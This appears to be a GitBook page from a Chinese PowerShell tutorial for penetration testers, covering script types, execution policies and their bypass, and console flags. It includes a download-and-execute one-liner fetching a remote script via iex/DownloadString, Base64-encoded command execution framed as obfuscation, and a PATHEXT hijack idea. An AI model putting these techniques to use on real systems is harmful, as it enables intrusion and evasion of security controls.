
<!DOCTYPE HTML>
<html lang="" >
    <head>
        <meta charset="UTF-8">
        <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
        <title>脚本编写与执行 · GitBook</title>
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="description" content="">
        <meta name="generator" content="GitBook 3.2.3">
        
        
        
    
    <link rel="stylesheet" href="gitbook/style.css">

    
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-highlight/website.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-search/search.css">
                
            
                
                <link rel="stylesheet" href="gitbook/gitbook-plugin-fontsettings/website.css">
                
            
        

    

    
        
    
        
    
        
    
        
    
        
    
        
    

        
    
    
    <meta name="HandheldFriendly" content="true"/>
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <link rel="apple-touch-icon-precomposed" sizes="152x152" href="gitbook/images/apple-touch-icon-precomposed-152.png">
    <link rel="shortcut icon" href="gitbook/images/favicon.ico" type="image/x-icon">

    
    <link rel="next" href="4. Scoket网络编程.html" />
    
    
    <link rel="prev" href="2. 基础.html" />
    

    </head>
    <body>
        
<div class="book">
    <div class="book-summary">
        
            
<div id="book-search-input" role="search">
    <input type="text" placeholder="Type to search" />
</div>

            
                <nav role="navigation">
                


<ul class="summary">
    
    

    

    
        
        
    
        <li class="chapter " data-level="1.1" data-path="./">
            
                <a href="./">
            
                    
                    前言
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2" data-path="kerberos/README.md">
            
                <span>
            
                    
                    基础篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.2.1" data-path="2. 基础.html">
            
                <a href="2. 基础.html">
            
                    
                    基础知识
            
                </a>
            

            
        </li>
    
        <li class="chapter active" data-level="1.2.2" data-path="3. 脚本编写与执行.html">
            
                <a href="3. 脚本编写与执行.html">
            
                    
                    脚本编写与执行
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.3" data-path="4. Scoket网络编程.html">
            
                <a href="4. Scoket网络编程.html">
            
                    
                    Scoket网络编程
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.4" data-path="5. 端口扫描与服务爆破.html">
            
                <a href="5. 端口扫描与服务爆破.html">
            
                    
                    端口扫描与服务爆破
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.2.5" data-path="6. 多线程.html">
            
                <a href="6. 多线程.html">
            
                    
                    多线程
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.3" data-path="ntlm-pian/README.md">
            
                <span>
            
                    
                    进阶篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.3.1" data-path="7. WMI对象操作.html">
            
                <a href="7. WMI对象操作.html">
            
                    
                    WMI&dot-net对象操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.2" data-path="8. Win32API.html">
            
                <a href="8. Win32API.html">
            
                    
                    Win32API
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.3" data-path="9. Dll注入&shellcode注入&exe注入.html">
            
                <a href="9. Dll注入&shellcode注入&exe注入.html">
            
                    
                    注入操作
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.4" data-path="10. 混淆.html">
            
                <a href="10. 混淆.html">
            
                    
                    混淆
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.3.5" data-path="11. 日志操作.html">
            
                <a href="11. 日志操作.html">
            
                    
                    日志操作
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    
        <li class="chapter " data-level="1.4" data-path="ldap-pian/README.md">
            
                <span>
            
                    
                    应用篇
            
                </a>
            

            
            <ul class="articles">
                
    
        <li class="chapter " data-level="1.4.1" data-path="12. 实例使用场景.html">
            
                <a href="12. 实例使用场景.html">
            
                    
                    实例使用场景
            
                </a>
            

            
        </li>
    
        <li class="chapter " data-level="1.4.2" data-path="13. Framework.html">
            
                <a href="13. Framework.html">
            
                    
                    Framework
            
                </a>
            

            
        </li>
    

            </ul>
            
        </li>
    

    

    <li class="divider"></li>

    <li>
        <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
            Published with GitBook
        </a>
    </li>
</ul>


                </nav>
            
        
    </div>

    <div class="book-body">
        
            <div class="body-inner">
                
                    

<div class="book-header" role="navigation">
    

    <!-- Title -->
    <h1>
        <i class="fa fa-circle-o-notch fa-spin"></i>
        <a href="." >脚本编写与执行</a>
    </h1>
</div>




                    <div class="page-wrapper" tabindex="-1" role="main">
                        <div class="page-inner">
                            
<div id="book-search-results">
    <div class="search-noresults">
    
                                <section class="normal markdown-section">
                                
                                <h1 id="powershell3-&#x811A;&#x672C;&#x6267;&#x884C;&#x57FA;&#x7840;">Powershell(3)-&#x811A;&#x672C;&#x6267;&#x884C;&#x57FA;&#x7840;</h1>
<h2 id="&#x5F00;&#x59CB;&#x4E4B;&#x524D;">&#x5F00;&#x59CB;&#x4E4B;&#x524D;</h2>
<p>&#x6211;&#x4EEC;&#x5728;&#x5F00;&#x59CB;&#x4E4B;&#x524D;&#x5148;&#x6765;&#x4ECB;&#x7ECD;&#x5728;windows&#x5E73;&#x53F0;&#x4E2D;&#x5E38;&#x7528;&#x5230;&#x7684;&#x51E0;&#x79CD;&#x811A;&#x672C;</p>
<h3 id="bat">Bat</h3>
<p>&#x8FD9;&#x5C31;&#x662F;&#x6211;&#x4EEC;&#x5E38;&#x7528;&#x7684;Bat&#x811A;&#x672C;&#xFF0C;&#x5168;&#x540D;&#x4E3A;&#x6279;&#x5904;&#x7406;&#x6587;&#x4EF6;&#xFF0C;&#x811A;&#x672C;&#x4E2D;&#x5C31;&#x662F;&#x6211;&#x4EEC;&#x5728;CMD&#x4E2D;&#x4F7F;&#x7528;&#x5230;&#x7684;&#x547D;&#x4EE4;&#xFF0C;&#x8FD9;&#x91CC;&#x63D0;&#x4E00;&#x4E2A;&#x5C0F;&#x95EE;&#x9898;&#xFF1A;
CMD&#x7684;&#x547D;&#x4EE4;&#x884C;&#x6267;&#x884C;&#x547D;&#x4EE4;&#x7684;&#x4F18;&#x5148;&#x7EA7;&#x662F;<code>.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH</code>&#xFF0C;&#x90A3;&#x4E48;&#x5047;&#x5982;&#x6211;&#x901A;&#x8FC7;&#x4FEE;&#x6539;PATHEXT&#x89E3;&#x6790;&#x987A;&#x5E8F;&#x540E;&#x653E;&#x4E00;&#x4E2A;cmd.bat&#x5728;system32&#x76EE;&#x5F55;&#x4E0B;&#xFF0C;&#x90A3;&#x4E48;&#x4F18;&#x5148;&#x6267;&#x884C;&#x7684;&#x662F;cmd.bat&#xFF0C;&#x8FD9;&#x91CC;&#x9762;&#x7684;&#x5185;&#x5BB9;&#x5C31;&#x53D8;&#x5F97;&#x4E0D;&#x53EF;&#x63CF;&#x8FF0;&#x8D77;&#x6765;&#x4E86;</p>
<h3 id="vbscript">VBscript</h3>
<p>&#x6267;&#x884C;vbs&#x5C31;&#x662F;&#x5E38;&#x8BF4;&#x7684;vbscript,&#x662F;&#x5FAE;&#x8F6F;&#x4E3A;&#x4E86;&#x65B9;&#x4FBF;&#x81EA;&#x52A8;&#x5316;&#x7BA1;&#x7406;windows&#x800C;&#x63A8;&#x51FA;&#x7684;&#x811A;&#x672C;&#x8BED;&#x8A00;&#xFF0C;&#x8FD9;&#x91CC;&#x4E86;&#x89E3;&#x4E00;&#x4E0B;&#x5373;&#x53EF;&#xFF0C;&#x4E0D;&#x662F;&#x6587;&#x7AE0;&#x91CD;&#x70B9;&#x3002;</p>
<pre><code class="lang-vbs">&#x4E00;&#x4E2A;&#x5C0F;&#x4F8B;&#x5B50;&#x901A;&#x8FC7;vbs&#x64CD;&#x4F5C;WMI
<span class="hljs-keyword">Set</span> wmi = <span class="hljs-built_in">GetObject</span>(<span class="hljs-string">&quot;winmgmts:&quot;</span>)
<span class="hljs-keyword">Set</span> collection = wmi.ExecQuery(<span class="hljs-string">&quot;select * from Win32_Process&quot;</span>)
<span class="hljs-keyword">For</span> <span class="hljs-keyword">Each</span> process <span class="hljs-keyword">in</span> collection
WScript.Echo process.getObjectText_
<span class="hljs-keyword">Next</span>
</code></pre>
<h2 id="powershell">Powershell</h2>
<p>&#x8FD9;&#x5C31;&#x662F;&#x6211;&#x4EEC;&#x7684;&#x4E3B;&#x89D2;&#xFF0C;&#x5728;&#x73B0;&#x5728;&#x548C;&#x672A;&#x6765;&#x4E00;&#x5B9A;&#x662F;powershell&#x5360;&#x636E;&#x4E3B;&#x8981;&#x5730;&#x4F4D;(&#x5BF9;&#x4E8E;&#x8FD9;&#x4E00;&#x70B9;&#x641E;Win&#x591A;&#x4E00;&#x70B9;&#x7684;&#x670B;&#x53CB;&#x4E00;&#x5B9A;&#x4E0D;&#x4F1A;&#x6000;&#x7591;)&#xFF0C;&#x9996;&#x5148;&#x6211;&#x4EEC;&#x6765;&#x770B;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;&#x4F8B;&#x5B50;</p>
<pre><code class="lang-powershell">script.ps1:
<span class="hljs-comment"># &#x811A;&#x672C;&#x5185;&#x5BB9;</span>
<span class="hljs-keyword">function</span> test-conn { Test-Connection  -Count <span class="hljs-number">2</span> -ComputerName <span class="hljs-variable">$args</span>}

<span class="hljs-comment"># &#x8F7D;&#x5165;&#x811A;&#x672C;&#x6587;&#x4EF6;</span>
.\script.ps1

<span class="hljs-comment"># &#x8C03;&#x7528;&#x51FD;&#x6570;</span>
test-conn localhost
</code></pre>
<h3 id="powershell&#x6267;&#x884C;&#x7B56;&#x7565;">Powershell&#x6267;&#x884C;&#x7B56;&#x7565;</h3>
<p>&#x90A3;&#x4E48;&#x4F60;&#x53EF;&#x80FD;&#x4F1A;&#x5728;&#x8C03;&#x7528;&#x811A;&#x672C;&#x7684;&#x65F6;&#x5019;&#x51FA;&#x73B0;&#x62A5;&#x9519;&#xFF0C;&#x8FD9;&#x662F;powershell&#x7684;&#x5B89;&#x5168;&#x6267;&#x884C;&#x7B56;&#x7565;&#xFF0C;&#x4E0B;&#x9762;&#x6211;&#x4EEC;&#x6765;&#x4E86;&#x89E3;&#x4E00;&#x4E0B;&#x6267;&#x884C;&#x7B56;&#x7565;&#xFF1A;
PowerShell &#x63D0;&#x4F9B;&#x4E86; Restricted&#x3001;AllSigned&#x3001;RemoteSigned&#x3001;Unrestricted&#x3001;Bypass&#x3001;Undefined &#x516D;&#x79CD;&#x7C7B;&#x578B;&#x7684;&#x6267;&#x884C;&#x7B56;&#x7565;
&#x7B80;&#x5355;&#x4ECB;&#x7ECD;&#x5404;&#x79CD;&#x7B56;&#x7565;&#x5982;&#x4E0B;&#xFF1A;</p>
<table>
<thead>
<tr>
<th style="text-align:left">&#x540D;&#x79F0;</th>
<th style="text-align:left">&#x8BF4;&#x660E;</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">Restricted</td>
<td style="text-align:left">&#x53D7;&#x9650;&#x5236;&#x7684;&#xFF0C;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x5355;&#x4E2A;&#x7684;&#x547D;&#x4EE4;&#xFF0C;&#x4F46;&#x662F;&#x4E0D;&#x80FD;&#x6267;&#x884C;&#x811A;&#x672C;Windows 8, Windows Server 2012, and Windows 8.1&#x4E2D;&#x9ED8;&#x8BA4;&#x5C31;&#x662F;&#x8FD9;&#x79CD;&#x7B56;&#x7565;&#xFF0C;&#x6240;&#x4EE5;&#x662F;&#x4E0D;&#x80FD;&#x6267;&#x884C;&#x811A;&#x672C;&#x7684;&#xFF0C;&#x6267;&#x884C;&#x5C31;&#x4F1A;&#x62A5;&#x9519;&#xFF0C;&#x90A3;&#x4E48;&#x5982;&#x4F55;&#x624D;&#x80FD;&#x6267;&#x884C;&#x5462;&#xFF1F;Set-ExecutionPolicy -ExecutionPolicy Bypass&#x5C31;&#x662F;&#x8BBE;&#x7F6E;&#x7B56;&#x7565;&#x4E3A;Bypass&#x8FD9;&#x6837;&#x5C31;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#x811A;&#x672C;&#x4E86;&#x3002;</td>
</tr>
<tr>
<td style="text-align:left">AllSigned</td>
<td style="text-align:left">AllSigned &#x6267;&#x884C;&#x7B56;&#x7565;&#x5141;&#x8BB8;&#x6267;&#x884C;&#x6240;&#x6709;&#x5177;&#x6709;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#x7684;&#x811A;&#x672C;</td>
</tr>
<tr>
<td style="text-align:left">RemoteSigned</td>
<td style="text-align:left">&#x5F53;&#x6267;&#x884C;&#x4ECE;&#x7F51;&#x7EDC;&#x4E0A;&#x4E0B;&#x8F7D;&#x7684;&#x811A;&#x672C;&#x65F6;&#xFF0C;&#x9700;&#x8981;&#x811A;&#x672C;&#x5177;&#x6709;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#xFF0C;&#x5426;&#x5219;&#x4E0D;&#x4F1A;&#x8FD0;&#x884C;&#x8FD9;&#x4E2A;&#x811A;&#x672C;&#x3002;&#x5982;&#x679C;&#x662F;&#x5728;&#x672C;&#x5730;&#x521B;&#x5EFA;&#x7684;&#x811A;&#x672C;&#x5219;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x6267;&#x884C;&#xFF0C;&#x4E0D;&#x8981;&#x6C42;&#x811A;&#x672C;&#x5177;&#x6709;&#x6570;&#x5B57;&#x7B7E;&#x540D;&#x3002;</td>
</tr>
<tr>
<td style="text-align:left">Unrestricted</td>
<td style="text-align:left">&#x8FD9;&#x662F;&#x4E00;&#x79CD;&#x6BD4;&#x8F83;&#x5BBD;&#x5BB9;&#x7684;&#x7B56;&#x7565;&#xFF0C;&#x5141;&#x8BB8;&#x8FD0;&#x884C;&#x672A;&#x7B7E;&#x540D;&#x7684;&#x811A;&#x672C;&#x3002;&#x5BF9;&#x4E8E;&#x4ECE;&#x7F51;&#x7EDC;&#x4E0A;&#x4E0B;&#x8F7D;&#x7684;&#x811A;&#x672C;&#xFF0C;&#x5728;&#x8FD0;&#x884C;&#x524D;&#x4F1A;&#x8FDB;&#x884C;&#x5B89;&#x5168;&#x6027;&#x63D0;&#x793A;&#x3002;&#x9700;&#x8981;&#x4F60;&#x786E;&#x8BA4;&#x662F;&#x5426;&#x6267;&#x884C;&#x811A;&#x672C;</td>
</tr>
<tr>
<td style="text-align:left">Bypass</td>
<td style="text-align:left">Bypass &#x6267;&#x884C;&#x7B56;&#x7565;&#x5BF9;&#x811A;&#x672C;&#x7684;&#x6267;&#x884C;&#x4E0D;&#x8BBE;&#x4EFB;&#x4F55;&#x7684;&#x9650;&#x5236;&#xFF0C;&#x4EFB;&#x4F55;&#x811A;&#x672C;&#x90FD;&#x53EF;&#x4EE5;&#x6267;&#x884C;&#xFF0C;&#x5E76;&#x4E14;&#x4E0D;&#x4F1A;&#x6709;&#x5B89;&#x5168;&#x6027;&#x63D0;&#x793A;&#x3002;</td>
</tr>
<tr>
<td style="text-align:left">Undefined</td>
<td style="text-align:left">Undefined &#x8868;&#x793A;&#x6CA1;&#x6709;&#x8BBE;&#x7F6E;&#x811A;&#x672C;&#x7B56;&#x7565;&#x3002;&#x5F53;&#x7136;&#x6B64;&#x65F6;&#x4F1A;&#x53D1;&#x751F;&#x7EE7;&#x627F;&#x6216;&#x5E94;&#x7528;&#x9ED8;&#x8BA4;&#x7684;&#x811A;&#x672C;&#x7B56;&#x7565;&#x3002;</td>
</tr>
</tbody>
</table>
<p>&#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x5982;&#x4F55;&#x7ED5;&#x8FC7;&#x8FD9;&#x4E9B;&#x5B89;&#x5168;&#x7B56;&#x7565;&#x5462;&#xFF1F;&#x4E0B;&#x9762;&#x63D0;&#x4F9B;&#x51E0;&#x79CD;&#x65B9;&#x6CD5;&#xFF0C;&#x7F51;&#x4E0A;&#x8FD8;&#x6709;&#x5F88;&#x591A;&#x7684;&#x7ED5;&#x8FC7;&#x65B9;&#x6CD5;&#xFF0C;&#x5927;&#x5BB6;&#x53EF;&#x4EE5;&#x81EA;&#x884C;&#x7814;&#x7A76;&#xFF1A;</p>
<table>
<thead>
<tr>
<th style="text-align:left">&#x540D;&#x79F0;</th>
<th style="text-align:left">&#x8BF4;&#x660E;</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">Get-ExecutionPolicy</td>
<td style="text-align:left">&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7684;&#x6267;&#x884C;&#x7B56;&#x7565;</td>
</tr>
<tr>
<td style="text-align:left">Get-Content .\test.ps1 \</td>
<td style="text-align:left">powershell.exe -noprofile -</td>
<td>&#x901A;&#x8FC7;&#x7BA1;&#x9053;&#x8F93;&#x5165;&#x8FDB;ps</td>
</tr>
<tr>
<td style="text-align:left">powershell -nop -c &quot;iex(New-Object Net.WebClient).DownloadString(&apos;<a href="http://192.168.1.2/test.ps1" target="_blank">http://192.168.1.2/test.ps1</a>&apos;)&quot;</td>
<td style="text-align:left">&#x901A;&#x8FC7;&#x8FDC;&#x7A0B;&#x4E0B;&#x8F7D;&#x811A;&#x672C;&#x6765;&#x7ED5;&#x8FC7;</td>
</tr>
<tr>
<td style="text-align:left">$command = &quot;Write-Host &apos;Hello World!&apos;&quot;<br>$bytes = [System.Text.Encoding]::Unicode.GetBytes($command) <br>$encodedCommand = [Convert]::ToBase64String($bytes) <br>powershell.exe -EncodedCommand $encodedCommand</td>
<td style="text-align:left">&#x901A;&#x8FC7;BASE64&#x7F16;&#x7801;&#x6267;&#x884C;</td>
</tr>
</tbody>
</table>
<h3 id="powershell&#x7684;&#x811A;&#x672C;&#x8C03;&#x7528;&#x65B9;&#x6CD5;&#xFF1A;">powershell&#x7684;&#x811A;&#x672C;&#x8C03;&#x7528;&#x65B9;&#x6CD5;&#xFF1A;</h3>
<ol>
<li>&#x5982;&#x679C;&#x811A;&#x672C;&#x662F;&#x76F4;&#x63A5;&#x5199;&#x7684;&#x4EE3;&#x7801;&#x800C;&#x4E0D;&#x662F;&#x53EA;&#x5B9A;&#x4E49;&#x4E86;&#x51FD;&#x6570;&#x90A3;&#x4E48;&#x76F4;&#x63A5;&#x6267;&#x884C;&#x811A;&#x672C;.\script.ps1&#x5373;&#x53EF;</li>
<li>&#x4F46;&#x662F;&#x5982;&#x679C;&#x662F;&#x8F7D;&#x5165;&#x91CC;&#x9762;&#x7684;&#x51FD;&#x6570;&#x9700;&#x8981;<code>.+&#x7A7A;&#x683C;+.\script.ps1</code></li>
<li>&#x6216;&#x8005;&#x4F7F;&#x7528;Import-Module .\script.ps1, &#x8FD9;&#x6837;&#x624D;&#x80FD;&#x76F4;&#x63A5;&#x4F7F;&#x7528;&#x811A;&#x672C;&#x7684;&#x51FD;&#x6570;</li>
</ol>
<h2 id="&#x901A;&#x8FC7;&#x63A7;&#x5236;&#x53F0;&#x6267;&#x884C;powershell">&#x901A;&#x8FC7;&#x63A7;&#x5236;&#x53F0;&#x6267;&#x884C;Powershell</h2>
<p>&#x5BF9;&#x4E8E;&#x6211;&#x4EEC;&#x5B89;&#x5168;&#x6D4B;&#x8BD5;&#x4EBA;&#x5458;&#x901A;&#x5E38;&#x83B7;&#x53D6;&#x5230;&#x7684;&#x4E00;&#x4E2A;Shell&#x662F;CMD&#x7684;, &#x90A3;&#x4E48;&#x6211;&#x4EEC;&#x60F3;&#x8981;&#x5C3D;&#x53EF;&#x80FD;&#x5C11;&#x7684;&#x64CD;&#x4F5C;&#x5C31;&#x53EF;&#x4EE5;&#x76F4;&#x63A5;&#x901A;&#x8FC7;&#x63A7;&#x5236;&#x53F0;&#x6765;&#x6267;&#x884C;powershell&#x7684;&#x547D;&#x4EE4;, &#x90A3;&#x4E48;&#x5148;&#x6765;&#x770B;&#x4E00;&#x4E2A;&#x7B80;&#x5355;&#x7684;&#x4F8B;&#x5B50;:</p>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps3/1.png" alt="">
&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x6211;&#x4EEC;&#x901A;&#x8FC7;CMD&#x754C;&#x9762;&#x6267;&#x884C;&#x4E86;Powershell&#x7684;&#x4EE3;&#x7801;, &#x90A3;&#x4E48;&#x5176;&#x5B9E;&#x8FD9;&#x6837;&#x7684;&#x6267;&#x884C;&#x65B9;&#x5F0F;&#x5728;&#x771F;&#x5B9E;&#x7684;&#x5B89;&#x5168;&#x6D4B;&#x8BD5;&#x73AF;&#x5883;&#x4E2D;&#x5229;&#x7528;&#x66F4;&#x591A;, &#x4E0B;&#x9762;&#x662F;&#x4E00;&#x4E2A;Powershell&#x901A;&#x8FC7;&#x8FD9;&#x79CD;&#x65B9;&#x5F0F;&#x6267;&#x884C;&#x7684;&#x6240;&#x6709;&#x53EF;&#x9009;&#x7684;&#x53C2;&#x6570;:</p>
<pre><code class="lang-powershell">PowerShell[.exe]
       [-PSConsoleFile &lt;file&gt; | -Version &lt;version&gt;]
       [-EncodedCommand &lt;Base64EncodedCommand&gt;]
       [-ExecutionPolicy &lt;ExecutionPolicy&gt;]
       [-File &lt;filePath&gt; &lt;args&gt;]
       [-InputFormat {Text | XML}] 
       [-NoExit]
       [-NoLogo]
       [-NonInteractive] 
       [-NoProfile] 
       [-OutputFormat {Text | XML}] 
       [-Sta]
       [-WindowStyle &lt;style&gt;]
       [-Command { - | &lt;script-block&gt; [-args &lt;arg-array&gt;]
                     | &lt;string&gt; [&lt;CommandParameters&gt;] } ]

PowerShell[.exe] -Help | -? | /?
</code></pre>
<table>
<thead>
<tr>
<th style="text-align:left">&#x540D;&#x79F0;</th>
<th style="text-align:left">&#x89E3;&#x91CA;</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">-Command</td>
<td style="text-align:left">&#x9700;&#x8981;&#x6267;&#x884C;&#x7684;&#x4EE3;&#x7801;</td>
</tr>
<tr>
<td style="text-align:left">-ExecutionPolicy</td>
<td style="text-align:left">&#x8BBE;&#x7F6E;&#x9ED8;&#x8BA4;&#x7684;&#x6267;&#x884C;&#x7B56;&#x7565;&#xFF0C;&#x4E00;&#x822C;&#x4F7F;&#x7528;Bypass</td>
</tr>
<tr>
<td style="text-align:left">-EncodedCommand</td>
<td style="text-align:left">&#x6267;&#x884C;Base64&#x4EE3;&#x7801;</td>
</tr>
<tr>
<td style="text-align:left">-File</td>
<td style="text-align:left">&#x8FD9;&#x662F;&#x9700;&#x8981;&#x6267;&#x884C;&#x7684;&#x811A;&#x672C;&#x540D;</td>
</tr>
<tr>
<td style="text-align:left">-NoExit</td>
<td style="text-align:left">&#x6267;&#x884C;&#x5B8C;&#x6210;&#x547D;&#x4EE4;&#x4E4B;&#x540E;&#x4E0D;&#x4F1A;&#x7ACB;&#x5373;&#x9000;&#x51FA;&#xFF0C;&#x6BD4;&#x5982;&#x6211;&#x4EEC;&#x6267;&#x884C;powerhsell whoami &#x6267;&#x884C;&#x5B8C;&#x6210;&#x4E4B;&#x540E;&#x4F1A;&#x63A8;&#x51FA;&#x6211;&#x4EEC;&#x7684;PS&#x4F1A;&#x8BDD;&#xFF0C;&#x5982;&#x679C;&#x6211;&#x4EEC;&#x52A0;&#x4E0A;&#x8FD9;&#x4E2A;&#x53C2;&#x6570;&#xFF0C;&#x8FD0;&#x884C;&#x5B8C;&#x4E4B;&#x540E;&#x8FD8;&#x662F;&#x4F1A;&#x7EE7;&#x7EED;&#x505C;&#x7559;&#x5728;PS&#x7684;&#x754C;&#x9762;</td>
</tr>
<tr>
<td style="text-align:left">-NoLogo</td>
<td style="text-align:left">&#x4E0D;&#x8F93;&#x51FA;PS&#x7684;Banner&#x4FE1;&#x606F;</td>
</tr>
<tr>
<td style="text-align:left">-Noninteractive</td>
<td style="text-align:left">&#x4E0D;&#x5F00;&#x542F;&#x4EA4;&#x4E92;&#x5F0F;&#x7684;&#x4F1A;&#x8BDD;</td>
</tr>
<tr>
<td style="text-align:left">-NoProfile</td>
<td style="text-align:left">&#x4E0D;&#x4F7F;&#x7528;&#x5F53;&#x524D;&#x7528;&#x6237;&#x4F7F;&#x7528;&#x7684;&#x914D;&#x7F6E;&#x6587;&#x4EF6;</td>
</tr>
<tr>
<td style="text-align:left">-Sta</td>
<td style="text-align:left">&#x4EE5;&#x5355;&#x7EBF;&#x7A0B;&#x6A21;&#x5F0F;&#x542F;&#x52A8;ps</td>
</tr>
<tr>
<td style="text-align:left">-Version</td>
<td style="text-align:left">&#x8BBE;&#x7F6E;&#x7528;&#x4EC0;&#x4E48;&#x7248;&#x672C;&#x53BB;&#x6267;&#x884C;&#x4EE3;&#x7801;</td>
</tr>
<tr>
<td style="text-align:left">-WindowStyle</td>
<td style="text-align:left">&#x8BBE;&#x7F6E;Powershell&#x7684;&#x6267;&#x884C;&#x7A97;&#x53E3;&#xFF0C;&#x6709;&#x4E0B;&#x9762;&#x7684;&#x53C2;&#x6570;Normal, Minimized, Maximized, or Hidden</td>
</tr>
</tbody>
</table>
<p>&#x6700;&#x540E;&#x4E3E;&#x4E00;&#x4E2A;&#x6267;&#x884C;Base64&#x4EE3;&#x7801;&#x7684;&#x4F8B;&#x5B50;:</p>
<ol>
<li>&#x6211;&#x4EEC;&#x5148;&#x8BD5;&#x7528;&#x4E0A;&#x9762;&#x4E00;&#x4E2A;&#x8868;&#x683C;&#x63D0;&#x5230;&#x7684;&#x7F16;&#x7801;&#x4EE3;&#x7801;&#x7F16;&#x7801;&#x547D;&#x4EE4;<code>whoami</code>, &#x5F97;&#x5230;&#x5B57;&#x7B26;&#x4E32;:<code>dwBoAG8AYQBtAGkACgA=</code></li>
<li>&#x901A;&#x8FC7;&#x4E0B;&#x9762;&#x7684;&#x547D;&#x4EE4;&#x6765;&#x6267;&#x884C;&#x4EE3;&#x7801;</li>
</ol>
<pre><code class="lang-powershell">powershell -EncodedCommand dwBoAG8AYQBtAGkACgA=
</code></pre>
<p><img src="https://raw.githubusercontent.com/myoss114/oss/master/uPic/ps3/2.png" alt=""></p>
<p>&#x90A3;&#x4E48;&#x8FD9;&#x79CD;&#x9700;&#x6C42;&#x5728;&#x4EC0;&#x4E48;&#x5730;&#x65B9;&#x5462;? &#x6BD4;&#x5982;&#x6211;&#x4EEC;&#x7684;&#x4EE3;&#x7801;&#x7279;&#x522B;&#x957F;&#x6216;&#x8005;&#x4F1A;&#x5F15;&#x8D77;&#x4E00;&#x8D77;&#x6B67;&#x4E49;&#x7684;&#x65F6;&#x5019;&#x5C31;&#x9700;&#x8981;&#x6211;&#x4EEC;&#x4F7F;&#x7528;&#x8FD9;&#x79CD;&#x65B9;&#x5F0F;&#x53BB;&#x6267;&#x884C;, &#x540C;&#x65F6;&#x4E5F;&#x662F;&#x4E00;&#x4E2A;&#x6DF7;&#x6DC6;&#x7684;&#x65B9;&#x5F0F;&#x3002;</p>

                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="2. 基础.html" class="navigation navigation-prev " aria-label="Previous page: 基础知识">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
                <a href="4. Scoket网络编程.html" class="navigation navigation-next " aria-label="Next page: Scoket网络编程">
                    <i class="fa fa-angle-right"></i>
                </a>
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"脚本编写与执行","level":"1.2.2","depth":2,"next":{"title":"Scoket网络编程","level":"1.2.3","depth":2,"path":"4. Scoket网络编程.md","ref":"4. Scoket网络编程.md","articles":[]},"previous":{"title":"基础知识","level":"1.2.1","depth":2,"path":"2. 基础.md","ref":"2. 基础.md","articles":[]},"dir":"ltr"},"config":{"gitbook":"*","theme":"default","variables":{},"plugins":["livereload"],"pluginsConfig":{"livereload":{},"highlight":{},"search":{},"lunr":{"maxIndexSize":1000000,"ignoreSpecialCharacters":false},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":false}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"}},"file":{"path":"3. 脚本编写与执行.md","mtime":"2020-04-13T09:48:14.634Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2020-04-13T09:56:21.455Z"},"basePath":".","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="gitbook/gitbook.js"></script>
    <script src="gitbook/theme.js"></script>
    
        
        <script src="gitbook/gitbook-plugin-livereload/plugin.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search-engine.js"></script>
        
    
        
        <script src="gitbook/gitbook-plugin-search/search.js"></script>
        
    
        
